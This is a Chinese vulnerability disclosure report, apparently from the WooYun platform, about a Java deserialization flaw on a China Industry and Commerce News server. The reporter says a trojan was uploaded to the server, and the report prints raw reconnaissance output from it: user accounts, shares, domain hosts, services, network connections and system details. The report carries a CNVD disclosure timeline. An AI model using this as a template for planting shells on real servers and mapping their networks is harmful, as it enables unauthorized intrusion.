2016-01-07: 细节已通知厂商并且等待厂商处理中 2016-01-11: 厂商已经确认,细节仅向厂商公开 2016-01-21: 细节向核心白帽子及相关领域专家公开 2016-01-31: 细节向普通白帽子公开 2016-02-10: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
《中国工商报》由国家工商行政管理总局主管,1987年7月创刊,是面向全国工商行政管理系统和广大工商企业的经济法制类报纸,是宣传工商行政管理工作、诠释工商行政管理法规的专业权威媒体。
打开官网http://**.**.**.**/,图中标识链接存在漏洞
地址**.**.**.**:7001/存在“Java 反序列化”漏洞
直接上传木马到服务器中
whoamigsbcb\administratornet user\\GSBJT 的用户帐户-------------------------------------------------------------------------------Administrator Guest 命令成功完成。net share共享名 资源 注解-------------------------------------------------------------------------------C$ C:\ 默认共享 D$ D:\ 默认共享 IPC$ 远程 IPC ADMIN$ C:\Windows 远程管理 命令成功完成。net view服务器名称 注解-------------------------------------------------------------------------------\\BSB-B \\CB-AD1 cb-ad1 \\CBSQL \\GSB-80 \\GSB-ACCESS \\GSB-ZHIJIAN \\GSBCB-HUIZIFABU \\GSBCB-SHTERM \\GSBJT 命令成功完成。net start已经启动以下 Windows 服务: 360Ent Http Server 360EntClientService 360EntPGSvc 360EntService Application Experience Background Intelligent Transfer Service Base Filtering Engine Certificate Propagation COM+ Event System Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client FileZilla Server FTP server Group Policy Client IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent Netlogon Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Power Print Spooler Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) Remote Registry RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection SQL Full-text Filter Daemon Launcher (MSSQLSERVER) SQL Server (MSSQLSERVER) SQL Server Analysis Services (MSSQLSERVER) SQL Server VSS Writer System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper User Profile Service Windows Event Log Windows Firewall Windows Font Cache Service Windows Management Instrumentation Windows Remote Management (WS-Management) Windows Time Windows Update Workstation 主动防御命令成功完成。netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:21 **.**.**.**:0 LISTENING 1528 TCP **.**.**.**:80 **.**.**.**:0 LISTENING 3028 TCP **.**.**.**:135 **.**.**.**:0 LISTENING 684 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1433 **.**.**.**:0 LISTENING 1708 TCP **.**.**.**:2383 **.**.**.**:0 LISTENING 1376 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 2804 TCP **.**.**.**:5001 **.**.**.**:0 LISTENING 3736 TCP **.**.**.**:8800 **.**.**.**:0 LISTENING 1352 TCP **.**.**.**:8890 **.**.**.**:0 LISTENING 1076 TCP **.**.**.**:47001 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 392 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 776 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 824 TCP **.**.**.**:49170 **.**.**.**:0 LISTENING 484 TCP **.**.**.**:49188 **.**.**.**:0 LISTENING 448 TCP **.**.**.**:49189 **.**.**.**:0 LISTENING 2844 TCP **.**.**.**:1434 **.**.**.**:0 LISTENING 1708 TCP **.**.**.**:5432 **.**.**.**:0 LISTENING 1620 TCP **.**.**.**:5432 **.**.**.**:49693 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:49694 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:50414 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:52181 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:61646 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:61647 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:61648 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:61649 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:62475 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:62476 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:62477 ESTABLISHED 1620 TCP **.**.**.**:5432 **.**.**.**:62478 ESTABLISHED 1620 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 3736 TCP **.**.**.**:14147 **.**.**.**:0 LISTENING 1528 TCP **.**.**.**:14147 **.**.**.**:50075 ESTABLISHED 1528 TCP **.**.**.**:49693 **.**.**.**:5432 ESTABLISHED 3740 TCP **.**.**.**:49694 **.**.**.**:5432 ESTABLISHED 3740 TCP **.**.**.**:50075 **.**.**.**:14147 ESTABLISHED 4568 TCP **.**.**.**:50414 **.**.**.**:5432 ESTABLISHED 3740 TCP **.**.**.**:52181 **.**.**.**:5432 ESTABLISHED 3924 TCP **.**.**.**:61646 **.**.**.**:5432 ESTABLISHED 2452 TCP **.**.**.**:61647 **.**.**.**:5432 ESTABLISHED 2452 TCP **.**.**.**:61648 **.**.**.**:5432 ESTABLISHED 2452 TCP **.**.**.**:61649 **.**.**.**:5432 ESTABLISHED 2452 TCP **.**.**.**:62475 **.**.**.**:5432 ESTABLISHED 2452 TCP **.**.**.**:62476 **.**.**.**:5432 ESTABLISHED 2452 TCP **.**.**.**:62477 **.**.**.**:5432 ESTABLISHED 2452 TCP **.**.**.**:62478 **.**.**.**:5432 ESTABLISHED 2452 TCP **.**.**.**:80 **.**.**.**:54204 TIME_WAIT 0 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1433 **.**.**.**:50106 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:50107 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:59728 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:59729 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:59730 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:59769 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:59770 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:63530 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:64672 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:64673 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:64674 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:64675 ESTABLISHED 1708 TCP **.**.**.**:1433 **.**.**.**:64676 ESTABLISHED 1708 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 3736 TCP **.**.**.**:7001 **.**.**.**:39394 ESTABLISHED 3736 TCP **.**.**.**:7001 **.**.**.**:39404 ESTABLISHED 3736 TCP **.**.**.**:7001 **.**.**.**:39995 ESTABLISHED 3736 TCP **.**.**.**:7001 **.**.**.**:40003 TIME_WAIT 0 TCP **.**.**.**:50106 **.**.**.**:1433 ESTABLISHED 4460 TCP **.**.**.**:50107 **.**.**.**:1433 ESTABLISHED 4460 TCP **.**.**.**:53798 **.**.**.**:80 CLOSE_WAIT 4584 TCP **.**.**.**:53801 **.**.**.**:80 CLOSE_WAIT 5256 TCP **.**.**.**:53883 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:54160 **.**.**.**:80 TIME_WAIT 0 TCP **.**.**.**:54187 **.**.**.**:80 TIME_WAIT 0 TCP **.**.**.**:54191 **.**.**.**:80 TIME_WAIT 0 TCP **.**.**.**:54192 **.**.**.**:80 TIME_WAIT 0 TCP **.**.**.**:54193 **.**.**.**:80 TIME_WAIT 0 TCP **.**.**.**:54194 **.**.**.**:80 TIME_WAIT 0 TCP **.**.**.**:54195 **.**.**.**:139 TIME_WAIT 0 TCP **.**.**.**:54204 **.**.**.**:80 TIME_WAIT 0 TCP **.**.**.**:54218 **.**.**.**:8888 SYN_SENT 996 TCP **.**.**.**:54219 **.**.**.**:8888 SYN_SENT 1360 TCP **.**.**.**:54220 **.**.**.**:8888 SYN_SENT 1360 TCP **.**.**.**:54221 **.**.**.**:8888 SYN_SENT 1360 TCP **.**.**.**:54222 **.**.**.**:8888 SYN_SENT 996 TCP **.**.**.**:54225 **.**.**.**:8888 SYN_SENT 996 TCP **.**.**.**:54226 **.**.**.**:8888 SYN_SENT 1360 TCP **.**.**.**:54227 **.**.**.**:8888 SYN_SENT 1360 TCP **.**.**.**:54228 **.**.**.**:8888 SYN_SENT 1360 TCP **.**.**.**:59728 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:59729 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:59730 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:59769 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:59770 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:62313 **.**.**.**:80 CLOSE_WAIT 3740 TCP **.**.**.**:63530 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:64672 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:64673 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:64674 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:64675 **.**.**.**:1433 ESTABLISHED 3736 TCP **.**.**.**:64676 **.**.**.**:1433 ESTABLISHED 3736 TCP [::]:21 [::]:0 LISTENING 1528 TCP [::]:135 [::]:0 LISTENING 684 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:1433 [::]:0 LISTENING 1708 TCP [::]:2383 [::]:0 LISTENING 1376 TCP [::]:3389 [::]:0 LISTENING 2804 TCP [::]:5001 [::]:0 LISTENING 3736 TCP [::]:8800 [::]:0 LISTENING 1352 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 392 TCP [::]:49153 [::]:0 LISTENING 776 TCP [::]:49154 [::]:0 LISTENING 824 TCP [::]:49170 [::]:0 LISTENING 484 TCP [::]:49188 [::]:0 LISTENING 448 TCP [::]:49189 [::]:0 LISTENING 2844 TCP [::1]:1434 [::]:0 LISTENING 1708 TCP [::1]:14147 [::]:0 LISTENING 1528 UDP **.**.**.**:123 *:* 872 UDP **.**.**.**:500 *:* 824 UDP **.**.**.**:4500 *:* 824 UDP **.**.**.**:5355 *:* 576 UDP **.**.**.**:7803 *:* 628 UDP **.**.**.**:53158 *:* 4192 UDP **.**.**.**:62028 *:* 3736 UDP **.**.**.**:51646 *:* 628 UDP **.**.**.**:52579 *:* 484 UDP **.**.**.**:52581 *:* 576 UDP **.**.**.**:55938 *:* 824 UDP **.**.**.**:58612 *:* 3028 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP [::]:123 *:* 872 UDP [::]:500 *:* 824 UDP [::]:4500 *:* 824 UDP [::]:5355 *:* 576 UDP [::]:62028 *:* 3736 UDP [::1]:55072 *:* 1620 UDP [fe80::a404:f9f6:b55f:daa%11]:546 *:* 776tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 256 暂缺 csrss.exe 340 暂缺 wininit.exe 392 暂缺 csrss.exe 400 暂缺 services.exe 448 暂缺 winlogon.exe 472 暂缺 lsass.exe 484 Netlogon, SamSs lsm.exe 492 暂缺 svchost.exe 600 DcomLaunch, PlugPlay, Power svchost.exe 684 RpcEptMapper, RpcSs svchost.exe 776 Dhcp, eventlog, lmhosts svchost.exe 824 AeLookupSvc, BITS, CertPropSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, SessionEnv, ShellHWDetection, Winmgmt, wuauserv svchost.exe 872 EventSystem, netprofm, nsi, W32Time svchost.exe 928 Netman, TrkWks, UmRdpService, UxSms ZhuDongFangYu.exe 988 ZhuDongFangYu 360rp.exe 996 暂缺 svchost.exe 576 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM svchost.exe 1060 BFE, DPS, MpsSvc spoolsv.exe 1228 Spooler 360EntClient.exe 1280 360EntClientSvc httpd.exe 1352 360EntHttpServer 360pccsvc.exe 1360 暂缺 pg_ctl.exe 1396 360EntPGSvc 360EntSvc.exe 1476 360EntSvc FileZilla server.exe 1528 FileZilla Server postgres.exe 1620 暂缺 conhost.exe 1628 暂缺 sqlservr.exe 1708 MSSQLSERVER postgres.exe 2020 暂缺 postgres.exe 2028 暂缺 postgres.exe 2036 暂缺 postgres.exe 2044 暂缺 postgres.exe 1080 暂缺 msmdsrv.exe 1376 MSSQLServerOLAPService svchost.exe 1656 RemoteRegistry sqlwriter.exe 2068 SQLWriter fdlauncher.exe 2748 MSSQLFDLauncher svchost.exe 2804 TermService svchost.exe 2844 PolicyAgent fdhost.exe 2880 暂缺 conhost.exe 2888 暂缺 360EntPublish.exe 3028 暂缺 360EntAdmin.exe 628 暂缺 rcrelay.exe 1076 暂缺 conhost.exe 2164 暂缺 360EntDT.exe 3740 暂缺 svchost.exe 3844 FontCache msdtc.exe 3508 MSDTC postgres.exe 4012 暂缺 postgres.exe 3884 暂缺 taskhost.exe 2912 暂缺 dwm.exe 964 暂缺 explorer.exe 3084 暂缺 360sd.exe 3592 暂缺 WmiPrvSE.exe 3720 暂缺 360EntClient.exe 4192 暂缺 FileZilla Server Interfac 4568 暂缺 jusched.exe 4584 暂缺 cmd.exe 4892 暂缺 conhost.exe 4656 暂缺 cmd.exe 4868 暂缺 conhost.exe 4896 暂缺 java.exe 3736 暂缺 java.exe 4460 暂缺 360EntConfigGuide.exe 3924 暂缺 jucheck.exe 5256 暂缺 postgres.exe 5244 暂缺 postgres.exe 1368 暂缺 httpd.exe 2452 暂缺 postgres.exe 6092 暂缺 postgres.exe 5224 暂缺 postgres.exe 5192 暂缺 postgres.exe 1808 暂缺 postgres.exe 4092 暂缺 postgres.exe 1288 暂缺 postgres.exe 1904 暂缺 postgres.exe 148 暂缺 tasklist.exe 2080 暂缺 conhost.exe 2920 暂缺 ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : gsbjt 主 DNS 后缀 . . . . . . . . . . . : **.**.**.** 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否 DNS 后缀搜索列表 . . . . . . . . : **.**.**.**以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端) 物理地址. . . . . . . . . . . . . : 00-23-7D-DF-E7-18 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::a404:f9f6:b55f:daa%11(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.**54 DHCPv6 IAID . . . . . . . . . . . : 234890109 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1C-01-BC-22-00-23-7D-DF-E7-18 DNS 服务器 . . . . . . . . . . . : **.**.**.** **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{D670E09B-C71B-4DF2-A8CA-3C11EB8C1306}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 Teredo Tunneling Pseudo-Interface: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是systeminfo主机名: GSBJTOS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 成员服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00486-OEM-8400691-20006初始安装日期: 2014/11/22, 11:36:30系统启动时间: 2015/10/8, 8:54:19系统制造商: Hewlett-Packard系统型号: ProLiant DL380 G6系统类型: x64-based PC处理器: 安装了 1 个处理器。 [01]: Intel64 Family 6 Model 26 Stepping 5 GenuineIntel ~2000 MhzBIOS 版本: Hewlett-Packard P62, 2009/2/23Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 4,086 MB可用的物理内存: 254 MB虚拟内存: 最大值: 8,170 MB虚拟内存: 可用: 3,569 MB虚拟内存: 使用中: 4,601 MB页面文件位置: C:\pagefile.sys域: **.**.**.**登录服务器: \\CB-AD1修补程序: 安装了 1 个修补程序。 [01]: KB976902网卡: 安装了 4 个 NIC。 [01]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端) 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::a404:f9f6:b55f:daa [02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端) 连接名: 本地连接 2 状态: 没有硬件 [03]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端) 连接名: 本地连接 3 状态: 没有硬件 [04]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端) 连接名: 本地连接 4 状态: 没有硬件
加强安全意识
危害等级:高
漏洞Rank:11
确认时间:2016-01-11 15:50
CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.
暂无
